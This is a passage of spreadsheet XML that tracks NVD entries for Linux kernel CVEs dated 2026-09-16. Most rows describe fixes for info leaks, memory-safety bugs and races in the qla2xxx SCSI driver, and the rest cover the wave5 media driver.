      <c r="C1563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89843</t>
        </is>
      </c>
      <c r="D1563" s="5" t="inlineStr"/>
      <c r="E1563" s="5" t="inlineStr"/>
      <c r="F1563" s="5" t="inlineStr"/>
      <c r="G1563" s="5" t="inlineStr"/>
      <c r="H1563" s="5" t="inlineStr"/>
      <c r="I1563" s="5" t="inlineStr"/>
      <c r="J1563" s="5" t="inlineStr"/>
      <c r="K1563" s="5" t="inlineStr"/>
      <c r="L1563" s="5" t="inlineStr"/>
      <c r="M1563" s="5" t="inlineStr"/>
      <c r="N1563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1563" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1563" s="5" t="inlineStr"/>
      <c r="Q1563" s="5" t="inlineStr"/>
      <c r="R1563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Zero-init bsg stack buffers to avoid info leak
Several bsg handlers stage their request/reply in an uninitialized 256-byte
on-stack buffer (uint8_t bsg[DMA_POOL_SIZE]) and fill it via
sg_copy_to_buffer(), which only copies as many bytes as the user-supplied
request payload. When the request is shorter than the structure, the
remainder of the buffer is left holding stale stack data.
qla2x00_read_fru_status() and qla2x00_read_i2c() then copy the full
structure back to the reply payload with sg_copy_from_buffer(), leaking the
uninitialized stack bytes to user space. The write/update paths do not copy
the buffer back, but can feed uninitialized fields to the device.
Zero the stack buffer at declaration in all five handlers, mirroring the
heap kzalloc() approach, so short requests can no longer expose stale
memory.</t>
        </is>
      </c>
      <c r="S1563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89843</t>
        </is>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89845</t>
        </is>
      </c>
      <c r="D1564" s="5" t="inlineStr"/>
      <c r="E1564" s="5" t="inlineStr"/>
      <c r="F1564" s="5" t="inlineStr"/>
      <c r="G1564" s="5" t="inlineStr"/>
      <c r="H1564" s="5" t="inlineStr"/>
      <c r="I1564" s="5" t="inlineStr"/>
      <c r="J1564" s="5" t="inlineStr"/>
      <c r="K1564" s="5" t="inlineStr"/>
      <c r="L1564" s="5" t="inlineStr"/>
      <c r="M1564" s="5" t="inlineStr"/>
      <c r="N1564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1564" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1564" s="5" t="inlineStr"/>
      <c r="Q1564" s="5" t="inlineStr"/>
      <c r="R1564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Avoid req_q_map double-read in qla2x00_error_entry()
qla2x00_error_entry() reads ha-&gt;req_q_map[que] twice: once for the NULL
check and again when assigning it to req. The map slot is cleared by
qla25xx_free_req_que() (ha-&gt;req_q_map[que_id] = NULL under mq_lock)
during queue teardown, while the response-queue interrupt that drives
qla2x00_error_entry() is still registered (the IRQ is released later in
qla25xx_free_rsp_que()). If the slot is set to NULL between the two
reads, req becomes NULL and is dereferenced.
Read the slot once into req and NULL-check the local before use. mq_lock
is a mutex and cannot be taken from interrupt context, so the single
read plus local check is the appropriate fix for the reported NULL
dereference.</t>
        </is>
      </c>
      <c r="S1564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89845</t>
        </is>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89850</t>
        </is>
      </c>
      <c r="D1565" s="5" t="inlineStr"/>
      <c r="E1565" s="5" t="inlineStr"/>
      <c r="F1565" s="5" t="inlineStr"/>
      <c r="G1565" s="5" t="inlineStr"/>
      <c r="H1565" s="5" t="inlineStr"/>
      <c r="I1565" s="5" t="inlineStr"/>
      <c r="J1565" s="5" t="inlineStr"/>
      <c r="K1565" s="5" t="inlineStr"/>
      <c r="L1565" s="5" t="inlineStr"/>
      <c r="M1565" s="5" t="inlineStr"/>
      <c r="N1565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1565" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1565" s="5" t="inlineStr"/>
      <c r="Q1565" s="5" t="inlineStr"/>
      <c r="R1565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Don't query firmware state while chip is down
qla2x00_fw_state_show() initializes rval to QLA_FUNCTION_FAILED and jumps
to the out: label when the chip is down or EEH is busy. The out: block
then re-issued qla2x00_get_firmware_state() because rval != QLA_SUCCESS,
defeating the chip-down/EEH-busy guards and issuing a mailbox command
(outside optrom_mutex) during ISP reset or PCI error recovery, which can
hang the adapter. It also turned a normal in-lock mailbox failure into a
second unsynchronized mailbox attempt.
Make the out: fallback only mark the firmware state as unknown. The
mailbox is now issued at most once, inside optrom_mutex, and only when
the chip is up and not EEH-busy.</t>
        </is>
      </c>
      <c r="S1565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89850</t>
        </is>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89851</t>
        </is>
      </c>
      <c r="D1566" s="5" t="inlineStr"/>
      <c r="E1566" s="5" t="inlineStr"/>
      <c r="F1566" s="5" t="inlineStr"/>
      <c r="G1566" s="5" t="inlineStr"/>
      <c r="H1566" s="5" t="inlineStr"/>
      <c r="I1566" s="5" t="inlineStr"/>
      <c r="J1566" s="5" t="inlineStr"/>
      <c r="K1566" s="5" t="inlineStr"/>
      <c r="L1566" s="5" t="inlineStr"/>
      <c r="M1566" s="5" t="inlineStr"/>
      <c r="N1566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1566" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1566" s="5" t="inlineStr"/>
      <c r="Q1566" s="5" t="inlineStr"/>
      <c r="R1566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix FCE trace enable parsing in debugfs
qla2x00_dfs_fce_write() called kstrtoul() with a NULL result pointer,
so a successful parse would dereference NULL and oops. Worse, the int
return value (0 on success, negative errno on failure) was assigned to
the unsigned long enable flag, inverting the intended logic: a valid
number was treated as "disable" while a parse failure enabled FCE.
Parse the value into enable and propagate parse errors to userspace.</t>
        </is>
      </c>
      <c r="S1566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89851</t>
        </is>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89852</t>
        </is>
      </c>
      <c r="D1567" s="5" t="inlineStr"/>
      <c r="E1567" s="5" t="inlineStr"/>
      <c r="F1567" s="5" t="inlineStr"/>
      <c r="G1567" s="5" t="inlineStr"/>
      <c r="H1567" s="5" t="inlineStr"/>
      <c r="I1567" s="5" t="inlineStr"/>
      <c r="J1567" s="5" t="inlineStr"/>
      <c r="K1567" s="5" t="inlineStr"/>
      <c r="L1567" s="5" t="inlineStr"/>
      <c r="M1567" s="5" t="inlineStr"/>
      <c r="N1567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1567" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1567" s="5" t="inlineStr"/>
      <c r="Q1567" s="5" t="inlineStr"/>
      <c r="R1567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Zero mailbox struct in qla2x00_get_firmware_state()
The mbx_cmd_t is allocated on the stack but left uninitialized.
qla2x00_mailbox_command() has several early-return paths (PCI permanent
failure, device failed, EEH busy, ISP abort pending, mailbox access
timeout, purge mbox) that return without writing the input mailbox
registers back into mcp-&gt;mb[]. qla2x00_get_firmware_state() then
unconditionally copies mcp-&gt;mb[1..6] (and mb[12]) into the caller's
states[] array regardless of the return value.
On such a failure the copied values are uninitialized kernel stack
memory, which is then exposed to userspace via the fw_state and
mpi_fw_state sysfs handlers. Zero the mailbox struct so a failed query
yields deterministic zeroed state instead of leaking stack contents.</t>
        </is>
      </c>
      <c r="S1567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89852</t>
        </is>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89853</t>
        </is>
      </c>
      <c r="D1568" s="5" t="inlineStr"/>
      <c r="E1568" s="5" t="inlineStr"/>
      <c r="F1568" s="5" t="inlineStr"/>
      <c r="G1568" s="5" t="inlineStr"/>
      <c r="H1568" s="5" t="inlineStr"/>
      <c r="I1568" s="5" t="inlineStr"/>
      <c r="J1568" s="5" t="inlineStr"/>
      <c r="K1568" s="5" t="inlineStr"/>
      <c r="L1568" s="5" t="inlineStr"/>
      <c r="M1568" s="5" t="inlineStr"/>
      <c r="N1568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1568" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1568" s="5" t="inlineStr"/>
      <c r="Q1568" s="5" t="inlineStr"/>
      <c r="R1568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix FCE trace use-after-free during firmware dump
qla2x00_free_fce_trace() freed and cleared ha-&gt;fce while holding only
fce_mutex. The firmware-dump consumers qla27xx_fwdt_entry_t264() and
qla25xx_copy_fce() read ha-&gt;fce (NULL check followed by a copy of the
buffer) under hardware_lock and never take fce_mutex. A debugfs FCE
disable could therefore free the DMA buffer between a dump's NULL check
and its copy, resulting in a use-after-free.
Unpublish ha-&gt;fce under hardware_lock, then release the lock and free
the DMA buffer (dma_free_coherent() may sleep). A concurrent dump either
completes its check and copy with the buffer still valid, or observes
ha-&gt;fce == NULL and skips it.</t>
        </is>
      </c>
      <c r="S1568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89853</t>
        </is>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89855</t>
        </is>
      </c>
      <c r="D1569" s="5" t="inlineStr"/>
      <c r="E1569" s="5" t="inlineStr"/>
      <c r="F1569" s="5" t="inlineStr"/>
      <c r="G1569" s="5" t="inlineStr"/>
      <c r="H1569" s="5" t="inlineStr"/>
      <c r="I1569" s="5" t="inlineStr"/>
      <c r="J1569" s="5" t="inlineStr"/>
      <c r="K1569" s="5" t="inlineStr"/>
      <c r="L1569" s="5" t="inlineStr"/>
      <c r="M1569" s="5" t="inlineStr"/>
      <c r="N1569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1569" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1569" s="5" t="inlineStr"/>
      <c r="Q1569" s="5" t="inlineStr"/>
      <c r="R1569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Serialize flash version read in reset handler
The "update cache versions without reset" sysfs reset operation (0x20261)
calls get_flash_version(), which reads hardware flash registers, without
holding ha-&gt;optrom_mutex. The VPD update path serializes the same call
under optrom_mutex, so this reset path can interleave its flash register
accesses with a concurrent VPD or optrom flash operation and corrupt the
reads.
Hold ha-&gt;optrom_mutex across the get_flash_version() call to match the
VPD update path.</t>
        </is>
      </c>
      <c r="S1569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89855</t>
        </is>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89858</t>
        </is>
      </c>
      <c r="D1570" s="5" t="inlineStr"/>
      <c r="E1570" s="5" t="inlineStr"/>
      <c r="F1570" s="5" t="inlineStr"/>
      <c r="G1570" s="5" t="inlineStr"/>
      <c r="H1570" s="5" t="inlineStr"/>
      <c r="I1570" s="5" t="inlineStr"/>
      <c r="J1570" s="5" t="inlineStr"/>
      <c r="K1570" s="5" t="inlineStr"/>
      <c r="L1570" s="5" t="inlineStr"/>
      <c r="M1570" s="5" t="inlineStr"/>
      <c r="N1570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1570" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1570" s="5" t="inlineStr"/>
      <c r="Q1570" s="5" t="inlineStr"/>
      <c r="R1570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Bound image count in qla2x00_update_fru_versions()
qla2x00_update_fru_versions() copies the user-supplied BSG request into
a fixed 256-byte stack buffer (bsg[DMA_POOL_SIZE]) and then iterates
list-&gt;count times over the qla_image_version array embedded in that
buffer, advancing the image pointer each iteration. count is taken
directly from user input with no upper bound, while only (DMA_POOL_SIZE
- sizeof(list-&gt;count)) / sizeof(struct qla_image_version) = 6 entries
actually fit. A larger count walks the image pointer off the end of the
stack buffer, reading adjacent kernel stack memory and sending it to the
device via qla2x00_write_sfp().
Reject requests whose declared count does not fit in the buffer.</t>
        </is>
      </c>
      <c r="S1570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89858</t>
        </is>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89859</t>
        </is>
      </c>
      <c r="D1571" s="5" t="inlineStr"/>
      <c r="E1571" s="5" t="inlineStr"/>
      <c r="F1571" s="5" t="inlineStr"/>
      <c r="G1571" s="5" t="inlineStr"/>
      <c r="H1571" s="5" t="inlineStr"/>
      <c r="I1571" s="5" t="inlineStr"/>
      <c r="J1571" s="5" t="inlineStr"/>
      <c r="K1571" s="5" t="inlineStr"/>
      <c r="L1571" s="5" t="inlineStr"/>
      <c r="M1571" s="5" t="inlineStr"/>
      <c r="N1571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1571" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1571" s="5" t="inlineStr"/>
      <c r="Q1571" s="5" t="inlineStr"/>
      <c r="R1571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Zero dport diagnostics buffer to avoid info leak
qla2x00_do_dport_diagnostics() allocates the qla_dport_diag response
buffer with kmalloc_obj() (non-zeroing) and, on success, copies the full
sizeof(*dd) back to user space via sg_copy_from_buffer(). The inbound
sg_copy_to_buffer() only fills as many bytes as the user request payload
provides, and qla26xx_dport_diagnostics() zeroes only dd-&gt;buf. The
options and unused[] fields are therefore copied out uninitialized,
leaking kernel heap contents to user space.
Allocate with kzalloc_obj(), matching qla2x00_do_dport_diagnostics_v2().</t>
        </is>
      </c>
      <c r="S1571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89859</t>
        </is>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89862</t>
        </is>
      </c>
      <c r="D1572" s="5" t="inlineStr"/>
      <c r="E1572" s="5" t="inlineStr"/>
      <c r="F1572" s="5" t="inlineStr"/>
      <c r="G1572" s="5" t="inlineStr"/>
      <c r="H1572" s="5" t="inlineStr"/>
      <c r="I1572" s="5" t="inlineStr"/>
      <c r="J1572" s="5" t="inlineStr"/>
      <c r="K1572" s="5" t="inlineStr"/>
      <c r="L1572" s="5" t="inlineStr"/>
      <c r="M1572" s="5" t="inlineStr"/>
      <c r="N1572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1572" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1572" s="5" t="inlineStr"/>
      <c r="Q1572" s="5" t="inlineStr"/>
      <c r="R1572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix BSG job leak on validate flash image error path
qla28xx_validate_flash_image() returns QLA_SUCCESS (0) unconditionally,
telling the FC BSG transport (fc_bsg_host_dispatch()) that the driver
owns and will complete the request. But bsg_job_done() is guarded by "if
(!rval)", so on the error path (rval == -EINVAL) neither the driver nor
the transport completes the job. The request dangles until it times out,
leaking block layer resources.
Commit c2c68225b145 ("scsi: qla2xxx: Fix bsg_done() causing double
free") added the "if (!rval)" guard to a batch of BSG handlers. That is
correct for handlers that also return the error code (the transport then
completes the job once via fail_host_msg), but this function returns
QLA_SUCCESS unconditionally, so the guard turned a correct single
completion into a leak.
Always call bsg_job_done(): bsg_reply-&gt;result is DID_OK and the error is
reported in vendor_rsp[0], and since the function returns 0 the
transport will not complete the job a second time.</t>
        </is>
      </c>
      <c r="S1572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89862</t>
        </is>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89864</t>
        </is>
      </c>
      <c r="D1573" s="5" t="inlineStr"/>
      <c r="E1573" s="5" t="inlineStr"/>
      <c r="F1573" s="5" t="inlineStr"/>
      <c r="G1573" s="5" t="inlineStr"/>
      <c r="H1573" s="5" t="inlineStr"/>
      <c r="I1573" s="5" t="inlineStr"/>
      <c r="J1573" s="5" t="inlineStr"/>
      <c r="K1573" s="5" t="inlineStr"/>
      <c r="L1573" s="5" t="inlineStr"/>
      <c r="M1573" s="5" t="inlineStr"/>
      <c r="N1573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1573" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1573" s="5" t="inlineStr"/>
      <c r="Q1573" s="5" t="inlineStr"/>
      <c r="R1573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Bound i2c-&gt;length in I2C bsg handlers
struct qla_i2c_access carries a 16-bit length field alongside a fixed
64-byte buffer:
	struct qla_i2c_access {
		uint16_t device, offset, option, length;
		uint8_t  buffer[0x40];
	} __packed;
qla2x00_write_i2c() and qla2x00_read_i2c() use the user-supplied
i2c-&gt;length without any bounds check. i2c is overlaid on a 256-byte
on-stack buffer and sfp is a 256-byte DMA-pool buffer, so a length up to
65535 overruns both:
  - write: memcpy(sfp, i2c-&gt;buffer, i2c-&gt;length) over-reads the stack and
    over-writes the sfp heap buffer, and qla2x00_write_sfp() then DMAs
    i2c-&gt;length bytes out of the 256-byte buffer.
  - read: qla2x00_read_sfp() DMAs i2c-&gt;length bytes into the 256-byte sfp,
    then memcpy(i2c-&gt;buffer, sfp, i2c-&gt;length) overflows the 64-byte
    buffer inside the on-stack array.
A caller holding CAP_SYS_RAWIO can use this to corrupt the heap and the
kernel stack. Reject requests whose length exceeds the buffer before any
copy or DMA transfer in both handlers.</t>
        </is>
      </c>
      <c r="S1573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89864</t>
        </is>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89865</t>
        </is>
      </c>
      <c r="D1574" s="5" t="inlineStr"/>
      <c r="E1574" s="5" t="inlineStr"/>
      <c r="F1574" s="5" t="inlineStr"/>
      <c r="G1574" s="5" t="inlineStr"/>
      <c r="H1574" s="5" t="inlineStr"/>
      <c r="I1574" s="5" t="inlineStr"/>
      <c r="J1574" s="5" t="inlineStr"/>
      <c r="K1574" s="5" t="inlineStr"/>
      <c r="L1574" s="5" t="inlineStr"/>
      <c r="M1574" s="5" t="inlineStr"/>
      <c r="N1574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1574" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1574" s="5" t="inlineStr"/>
      <c r="Q1574" s="5" t="inlineStr"/>
      <c r="R1574" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Zero SFP DMA buffer in FRU/I2C bsg handlers
The FRU and I2C bsg handlers stage their transfer in a DMA_POOL_SIZE
(256-byte) bounce buffer obtained from dma_pool_alloc(), which does not
zero the allocation. They initialize only a few leading bytes before
handing the buffer to qla2x00_write_sfp().
qla2x00_write_sfp() can override the transfer length with a user-supplied
value:
	if (len == 1)
		opt |= BIT_0;
	if (opt &amp; BIT_0)
		len = *sfp;
*sfp is the first byte of the (user-controlled) payload, so len can grow
up to 255. The device then DMA-reads len bytes from the 256-byte pool
buffer. Since only a small prefix was written
(e.g. MAX_FRU_SIZE == 36 bytes for a FRU version, one byte for a FRU
status register), the hardware reads past the initialized region and
writes up to ~219 bytes of stale DMA-pool heap memory to the device
flash.
Allocate the buffer with dma_pool_zalloc() in all five FRU/I2C handlers
so any bytes beyond the initialized data are zero rather than stale heap
contents.</t>
        </is>
      </c>
      <c r="S1574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89865</t>
        </is>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89866</t>
        </is>
      </c>
      <c r="D1575" s="5" t="inlineStr"/>
      <c r="E1575" s="5" t="inlineStr"/>
      <c r="F1575" s="5" t="inlineStr"/>
      <c r="G1575" s="5" t="inlineStr"/>
      <c r="H1575" s="5" t="inlineStr"/>
      <c r="I1575" s="5" t="inlineStr"/>
      <c r="J1575" s="5" t="inlineStr"/>
      <c r="K1575" s="5" t="inlineStr"/>
      <c r="L1575" s="5" t="inlineStr"/>
      <c r="M1575" s="5" t="inlineStr"/>
      <c r="N1575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1575" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1575" s="5" t="inlineStr"/>
      <c r="Q1575" s="5" t="inlineStr"/>
      <c r="R1575" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: chips-media: wave5: Resume device before setting EOS flag
Setting the EOS flag talks to the firmware via send_firmware_command(),
which accesses VPU registers. Both the STREAMOFF path
(wave5_vpu_dec_job_abort()) and the V4L2_DEC_CMD_STOP path
(wave5_vpu_dec_stop()) can run while the device is runtime suspended, so
those register accesses hit powered-down hardware and the SoC raises an
asynchronous SError, panicking the kernel:
  SError Interrupt on CPU3, code 0x00000000bf000000 -- SError
   send_firmware_command+0x2c/0x160 [wave5]
   wave5_vpu_dec_set_bitstream_flag+0x6c/0x80 [wave5]
   wave5_vpu_dec_update_bitstream_buffer+0x80/0xec [wave5]
   wave5_vpu_dec_job_abort+0x44/0xa0 [wave5]
   v4l2_m2m_cancel_job+0x110/0x19c [v4l2_mem2mem]
   v4l2_m2m_streamoff+0x24/0x140 [v4l2_mem2mem]
Resume the device with pm_runtime_resume_and_get() around the EOS
firmware command and release it with pm_runtime_put_autosuspend(),
matching the runtime PM handling already done in
wave5_vpu_dec_device_run().</t>
        </is>
      </c>
      <c r="S1575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89866</t>
        </is>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89867</t>
        </is>
      </c>
      <c r="D1576" s="5" t="inlineStr"/>
      <c r="E1576" s="5" t="inlineStr"/>
      <c r="F1576" s="5" t="inlineStr"/>
      <c r="G1576" s="5" t="inlineStr"/>
      <c r="H1576" s="5" t="inlineStr"/>
      <c r="I1576" s="5" t="inlineStr"/>
      <c r="J1576" s="5" t="inlineStr"/>
      <c r="K1576" s="5" t="inlineStr"/>
      <c r="L1576" s="5" t="inlineStr"/>
      <c r="M1576" s="5" t="inlineStr"/>
      <c r="N1576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1576" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1576" s="5" t="inlineStr"/>
      <c r="Q1576" s="5" t="inlineStr"/>
      <c r="R1576" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: chips-media: wave5: Defer job_finish() only when a DEC_PIC was queued
Decoder instances sharing a VPU also share one v4l2_m2m job slot, released
when the running context calls v4l2_m2m_job_finish(). While draining,
device_run() defers job_finish() once EOS is sent (sent_eos), expecting a
later finish_decode() (from a DEC_PIC completion IRQ) to release the slot.
But the m2m core checks job_ready() only when a job is queued, not when it
is dispatched. A job queued while draining can run after finish_decode()
has already moved the instance to STOP and sent EOS. device_run() then runs
in STOP, issues no DEC_PIC, yet still skips job_finish() - so no IRQ, no
finish_decode(), and the shared slot is leaked, stalling every instance.
With several v4l2h264dec instances in parallel, GStreamer hangs at EOS.
Track whether the run actually queued a DEC_PIC (cmd_issued) and defer
job_finish() only then. Otherwise finish the job immediately</t>
        </is>
      </c>
      <c r="S1576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89867</t>
        </is>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89868</t>
        </is>
      </c>
      <c r="D1577" s="5" t="inlineStr"/>
      <c r="E1577" s="5" t="inlineStr"/>
      <c r="F1577" s="5" t="inlineStr"/>
      <c r="G1577" s="5" t="inlineStr"/>
      <c r="H1577" s="5" t="inlineStr"/>
      <c r="I1577" s="5" t="inlineStr"/>
      <c r="J1577" s="5" t="inlineStr"/>
      <c r="K1577" s="5" t="inlineStr"/>
      <c r="L1577" s="5" t="inlineStr"/>
      <c r="M1577" s="5" t="inlineStr"/>
      <c r="N1577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1577" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1577" s="5" t="inlineStr"/>
      <c r="Q1577" s="5" t="inlineStr"/>
      <c r="R1577" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: chips-media: wave5: Add timeout while stop_streaming
